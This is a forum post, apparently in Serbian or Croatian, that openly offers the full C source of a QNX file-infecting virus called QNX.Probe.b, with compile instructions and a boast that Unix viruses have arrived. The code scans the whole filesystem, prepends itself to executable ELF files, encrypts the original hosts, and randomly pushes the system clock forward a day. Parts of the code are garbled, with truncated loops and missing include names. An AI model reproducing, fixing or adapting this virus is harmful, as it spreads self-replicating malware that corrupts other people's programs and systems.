QNX virusOS: QNX; Oblast: Virus; Oba?;
Evo, opet vam donosim još jedan ekskluzivan kod! Ovaj put QNX Virus pod imenom QNX.Probe v1.1. Ovaj crv QNX EFL dolazi kao dokument, crv je parazitskoga tipa, nalazi se u skrivenim procesima tako da se skriva od ostalih korisnika. Inficira EFL dokumente u sistemu, ima QNX playlod dodatak koji je napisan samo za ovaj virus i QNX OS. Ovaj crv je jako opasan, pa zato pazite! Nadam se da vise nećete misliti da samo Windowsi imaju viruse, došlo je vreme UNIX virusa :))). Ovaj virus je prirodan QNX virus, nije klon UNIX virusa.
Uživajte...
Treba kompajrilati: cc probeb.c , strip probeb
#include // Declare necessary libraryes
#include
#include
#include
#include
#include
#include
#define virus_len 5440 // Define the size of the virus body
#define work_path "/" // Define the initial directory for scan,
// where virus will be looking for the files
#define byte_block virus_len // Define block size (used while copying)
#define name_len sizeof(our_name) // Define the size of virus name
char our_name[] = "QNX.Probe.b"; // Virus name and the infection mark
// at the same time
int our_fd, tmp_fd; // Declare variables
char buffer[byte_block], buffer1[byte_block], vir_buf[virus_len];
int process_file(const char*, const struct stat*, int); // Declare used
void check_payload(void); // functions
int main(int argc, char **argv, char **envp) // Main function
{
char *exec_tmp; // Declare yet another variables
ssize_t bytes_cnt;
pid_t pid;
if ((our_fd = open(argv[0], O_RDONLY)) != -1)
// Open currently runned file
{ // If file was opened, proceed the next commands...
if (read(our_fd, vir_buf, virus_len) == -1) exit(-1);
// Read virus_len bytes from this file
exec_tmp = tempnam(NULL, argv[0]);
// Create the name for temporary file
if ((tmp_fd = open(exec_tmp, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// And open this file
{ // If an error has occured whilt opening...
close(our_fd); // Close ourself
exit(-1); // Exit with error
}
while(1)
{ // Decryption procedure
unsigned csum0; // Declare yet another variable
if (read(our_fd, &csum0, 4) != 4) break;
// Read 4 bytes (there must be the checksum
// of the next going block
bytes_cnt = read(our_fd, buffer, byte_block);
// Read next going block
if (bytes_cnt == 0) break; // If no bytes was readed -
// exit procedure encryption
for(;;)
{ // Decryption
int key = rand() % 10000; // Take random key
int i; // Declare yet another....
unsigned csum=0; // And another....
for(i=0; i {
buffer1 = buffer ^ key; // XOR it with a key
key += our_name[i % name_len] ^ i; // Modify key
}
for(i=0; i // the uncrypted block
{
csum += buffer1 ^ i; // Get the checksum
csum = (csum >> 1) | (csum << 31); // Crypt it
}
if (csum == csum0) break; // If current checksum is equial to
// the saved - stop uncryption
} // Decryption ends
write(tmp_fd, buffer1, bytes_cnt); // Write uncrypted buffer
// to the temp file
} // Finish decription
close(tmp_fd); // Close temp file
close(our_fd); // Close ourself
check_payload();
pid = fork(); // system call fork()
if (pid == 0) // If it is parent process
{
execve(exec_tmp, argv, envp); // Run temp file
unlink(exec_tmp); // If an error - delete temp file
exit(-1); // and exit with an error
}
else if (pid > 0) // If it is not a parent process
{
ftw(work_path, process_file, 1);
// Scan directory tree and for each
// founded file call process_file()
}
unlink(exec_tmp); // Delete temp file
exit(0); // Exit
}
} // End of the function "main()"
int process_file(const char *vic_name, const struct stat *status, int type)
{ // Function "process_file()"
int vic_perm, vic_fd, bytes_cnt; // Declare necessary variables
vic_perm = status->st_mode; // Take file permissions
if ((status->st_mode&S_IFREG) && (status->st_mode&(S_IXUSR|S_IXGRP|S_IXOTH)))
{ // If it is a regular and executable file...
char *tmp_name; // Declare......
if (chmod(vic_name, S_IRUSR|S_IWUSR) == -1) return 0;
// Change permissions to the
// readable/writeable for current user
// If an error - exit function
if ((vic_fd = open(vic_name, O_RDWR)) == -1)
// Open victim file for read/write
{ // If an error has occured while opening...
chmod(vic_name, vic_perm); // Restore original permissions
return 0; // Exit function
}
tmp_name = tempnam(NULL, "tmp"); // Create temp file name
if ((tmp_fd = open(tmp_name, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// Open temp file
{ // If an error was occured while opening
close(vic_fd); // Close victim file
chmod(vic_name, vic_perm); // Restore it`s permissions
return 0; // Exit function
}
if ((bytes_cnt = read(vic_fd, buffer, byte_block)) == -1)
// Read block from victim
{ // If an error...
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore victim`s permissions
return 0; // Exit function
}
if (bytes_cnt > name_len)
{ // If was readed more than "name_len" bytes
char *i; // Declare.....
for(i=buffer; i<(buffer+byte_block-name_len); i++)
// For all readed bytes
{
if ((!strcmp(i, our_name)) || (strncmp(buffer+1, "ELF", 3)))
{ // If victim file is infected or isn`t an ELF file
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore permissions
return 0; // Exit function
}
}
}
lseek(vic_fd, 0, SEEK_SET); // Go to the beginning of the victim
write(tmp_fd, vir_buf, virus_len);
// Write virus body to the temp file
while((bytes_cnt = read(vic_fd, buffer, byte_block)) > 0)
// For all bytes of the block of the
// victim body
{ // Encryption procedure
int i; //
int key = rand() % 10000; // Declare...
unsigned csum=0; // And again...
for(i=0; i {
csum += buffer ^ i; // Get the checksum...
csum = (csum >> 1) | (csum << 31); // Crypt it
}
for(i=0; i {
buffer ^= key; // XOR byte
key += our_name[i % name_len] ^ i; // Modify the key
}
// } Encryption ends
write(tmp_fd, &csum, 4); // Write checksum to the temp file
write(tmp_fd, buffer, bytes_cnt);
// write block to the temp file
}
close(vic_fd); // Close victim
close(tmp_fd); // Close temp file
if (rename(tmp_name, vic_name) == -1)
// Rename temp file to the victim
{ // If an error was occured while renaming...
unlink(tmp_name); // Delete temp file
}
chmod(vic_name, vic_perm); // Restore victim`s permissions
}
return 0; // Exit function
} // End of the function "process_file()"
void check_payload(void)
{ // Payload function
srand(time(NULL)); // Initialize randomer
if (rand() % 900 == 555) // If random number equal to 555
{
struct timespec the_time; // Declare.......
clock_gettime(CLOCK_REALTIME, &the_time); // Get calendar time
the_time.tv_sec += (60 * 60) * 24; // Add one day
the_time.tv_nsec = 0; // Must to be zero
clock_settime(CLOCK_REALTIME, &the_time); // Set new calendar time
}
}
OVO samo postavio jer je zanimljivo da i male unix verzije mogu imati opasnost od virusa
I don't need a reason!!!
